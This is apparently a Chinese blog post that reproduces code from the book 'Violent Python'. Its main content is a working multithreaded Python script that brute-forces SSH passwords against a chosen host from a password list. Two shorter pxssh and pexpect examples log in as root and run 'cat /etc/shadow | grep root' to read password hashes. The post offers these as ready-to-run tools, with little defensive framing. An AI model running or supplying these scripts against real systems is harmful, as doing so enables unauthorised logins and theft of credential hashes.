2. 程式人生 > >SSH暴力破解之Python-pxssh實現

SSH暴力破解之Python-pxssh實現

阿新 發佈:2019-02-03

最近在看《Violent Python》,記錄一些程式碼實現。

0x00 SSH暴力破解之Python-pexssh實現

Pxssh是一個包含了pexpect庫的專用指令碼,它能用預先寫好的login()、logout()、prompt()等函式直接與SSH進行互動。

簡單示例:

import pxssh
def send_command(s, cmd):
    s.sendline(cmd)
	s.prompt()
	print s.before
def connect(host, user, password):
	try:
	    # Init a pxssh object
	    s = pxssh.pxssh()
	    s.login(host, user, password)
	    return send_command
	except:
	    print '[-] Error Connecting'
		exit(0)
s = connect('127.0.0.1', 'root', 'root')
send_command(s, 'cat /etc/shadow | grep root')
0x01 程式碼實現 
import pxssh
import optparse
import time
from threading import *
# Set maxconnections of threads
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    # User the global variables
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        #  Try login with user/password
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read_nonblocking' in str(e):
            Fails += 1
            time.sleep(5)
            # Try again
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            # Try again
            connect(host, user, password, False)
    finally:
        # If get a wrong-pass answer, then release a thread-lock
        if release:
            connection_lock.release()
def main():
    parser = optparse.OptionParser("usage%prog -H <target host> -u <user> -F <password list>")
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-u', dest='user', type='string', help='specify the user')
    parser.add_option('-F', dest='passwdFile', type='string', help='specify password file')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    user = options.user
    passwdFile = options.passwdFile
    if (host == None) | (user == None) | (passwdFile == None):
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
	if Found:
            # If passwdFile enum ends before a thread found the passwd, 'Exiting...' will not be able to echo on the screen
            print "[*] Exiting: Password  Found"
            exit(0)
        if Fails > 5:
            print "[!] Exiting: Too Many Socket Timeouts"
            exit(0)
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] Testing: " + str(password)
        t = Thread(target = connect, args = (host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()
0x02 效果


0x03 pexpect後記

使用pexpect庫得安裝ptyprocess,連結:

https://pypi.python.org/pypi/ptyprocess
https://pypi.python.org/pypi/pexpect

建議先了解pexpect庫,pxssh畢竟只是一個SSH定製化的庫,pexpect庫還是很強大的,尤其是顯示與程式的互動和等待預期螢幕輸出,並給出不同響應。

簡單示例:

import pexpect
PROMPT = ['# ', '>>> ', '> ', '\$ ']
def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print child.before
def connect(user, host, password):
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    child = pexpect.spawn(connStr)
    print 'Ready to execut: ' + connStr
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:'])
    if ret == 0:
        print '[-] Error Connecting'
        return
    if ret == 1:
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:'])
    if ret == 0:
        print 'Error Connecting'
        return
    child.sendline(password)
    child.expect(PROMPT)
    return child
def main():
    host = '192.168.226.134'
    user = 'root'
    password = 'toor'
    child = connect(user, host, password)
    if child != None:
        send_command(child, 'cat /etc/shadow |grep root')
if __name__ == '__main__':
    main()

have fun~

相關推薦

SSH暴力破解Python-pxssh實現

最近在看《Violent Python》,記錄一些程式碼實現。 0x00 SSH暴力破解之Python-pexssh實現 Pxssh是一個包含了pexpect庫的專用指令碼,它能用預先寫好的login()、logout()、prompt()等函式直接與SSH進行互動。 簡單

shell 自動檢查SSH暴力破解IP並阻斷攻擊

ssh在5分鐘內嘗試密碼登錄錯誤超過10次的拒絕這個ip#!/bin/bashlocal_ip="192.168.0.4" #定義本地IP不會被拒絕tmp_log=`mktemp`cat /var/log/secure |grep "Failed password for root from" |awk

linux 防止ssh暴力破解密碼

blog color for col logs pan linux define rep 收集 /var/log/secure 裏面的信息,若是某個IP 鏈接次數超過一定次數 ,則把此ip記錄到/etc/hosts.deny裏面 #!/bin/bash #Denyh

Centos下防止ssh暴力破解密碼的方法

方法一、 收集 /var/log/secure 裡面的資訊,若是某個IP 連結次數超過一定次數 ,則把此ip記錄到/etc/hosts.deny裡面。 通過crontab來執行,每分鐘執行一次。 */1 * * * * /root/Denyhosts/Denyh

Linux應急響應手冊--SSH暴力破解

0x00 前言         SSH 是目前較可靠,專為遠端登入會話和其他網路服務提供安全性的協議,主要用於給遠端登入會話資料進行加密,保證資料傳輸的安全。SSH口令長度太短或者複雜度不夠,如僅包含數字,或僅包含字母等,容易被攻擊者破解,一旦被攻擊者獲取,可用來直接登

如何防止SSH暴力破解

當你檢視你的 SSH 服務日誌,可能你會發現充斥著一些不懷好意的嘗試性登入。這裡有 9 條常規建議(和一些個別特殊策略)可以讓你的 SSH 會話更加安全。 其中有很多辦法來阻擋這些密碼嘗試: 0 1、修改埠

SSH 暴力破解趨勢:從雲平臺向物聯網裝置遷移 | 雲鼎實驗室出品

導讀:近日,騰訊雲釋出2018上半年安全專題系列研究報告,該系列報告圍繞雲上使用者最常遭遇的安全威脅展開,用資料統計揭露攻擊現狀,通過溯源還原攻擊者手法,讓企業使用者與其他使用者在應對攻擊時有跡可循,併為其提供可靠的安全指南。上篇報告從 DDoS 攻擊的角度揭示了雲上攻擊最新趨勢,本篇由同一技術團隊

iptables防止ssh 暴力破解

最近在IBM 免費提供的Bluemix虛擬機器上玩shadowsocks代理,檢視日誌的時候無意間發現很多壞蛋在暴力破解我的ssh,真是用心良苦,俺可是用的key來登入哦,那可是公認最安全的登入方式了,為了加固一下系統安全,去設定一下iptables阻止一下這種行為。期初

linux下shell指令碼防ssh暴力破解

文章出處:http://coolnull.com/2059.html 說明: 本篇實現shell統計訪問失敗的IP和次數,從而根據這些再通過防火牆規則來限制這些IP再次暴破,指令碼如下:實現: 1.編寫shell指令碼 # cat /root/ssh_failed.sh

ssh暴力破解防護軟體

ssh暴力破解一直是個頭疼的問題。 今天下決心來解決下。免密登入是終極解決方法。但是有時候確實不太方便(隨時攜帶金鑰,或者放到雲盤裡面)。 google後發現一款ssh防護軟體,好用 它會根據log自動提取暴力密碼破解的IP並加入黑名單(hosts.deny)。可以根據需

Centos下防止ssh暴力破解密碼的方法,有兩個,我用了第一種,效果很好。

公司伺服器檢視/var/log/secure 檔案可以看到很多認證失敗的Failure的ip登入資訊。所以想到根據secure檔案檢視失敗的ip如果超過五次,那麼就把此ip寫入/etc/hosts.deny檔案,禁止此ip登入。我用了第一種方法,設定了定時任務,每分鐘執行

Python指令碼暴力破解SSH口令以及構建僵屍網路(pxssh)

目錄 暴力破解SSH口令 SSH遠端執行命令 構建僵屍網路 環境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect庫的ssh專用指令碼,他能用預先寫好的 login()、logout() 和 pro

GJCTF模擬題python暴力破解網站管理員密碼

題目地址:http://www.czlgjbbq.top/GJCTF/brute.php php原始碼: <?php error_reporting(0); session_start(); if(empty($_COOKIE['f14g']) || empty($_SES

滲透——Metasploit自定義SSH認證暴力破解

轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/86380258 這裡,我們首先編寫一個指令碼ssh_brute_by_binghe.rb,具體如下: ## # Author 冰河 # Date 2019-01-12 #

Python實現FTP暴力破解

最近在看《Violent Python》,記錄一些程式碼實現。 0x00 FTP暴力破解之PTYHON實現 需使用ftplib庫,書中採用單執行緒,這裡我使用了多執行緒完成,匿名登入的問題暫時沒有找機子試,如有問題可以探討~ 0x01 程式碼實現 import optpa

PythonFTP伺服器暴力破解(注入木馬)

密碼字典下載:[email protected]:qq_21792169/dictionary.gitftp.py#!/usr/bin/python # -*- coding: utf-8 -*- import ftplib import optparse impo

SSH進階路】Struts基本原理 + 實現簡單登錄(二)

target doctype 掌握 pack insert enter snippet file manage 上面博文,主要簡單的介紹了一下SSH的基本概念,比較宏觀。作為剛開始學習的人可以有一個總體上的認識,個人覺得對學習有非常好的輔助功能,它不不過

web實戰暴力破解

web安全本文出自 “大李子” 博客,謝絕轉載!web實戰之暴力破解

機器學習入門python實現圖片簡單分類

numbers org 路徑 圖片分類 jpg animal 入門 res windows 小任務:實現圖片分類 1.圖片素材 python批量壓縮jpg圖片: PIL庫 resize http://blog.csdn.net/u012234115/article/

常見排序算法python實現

uic 位置 cti gte https 最大值 ice 插入排序 快速   本文介紹了幾種常用的排序算法,包含冒泡排序,選擇排序,插入排序,歸並排序,快速排序,堆排序,本文涉及的代碼可以在https://github.com/lianyingteng/Programmin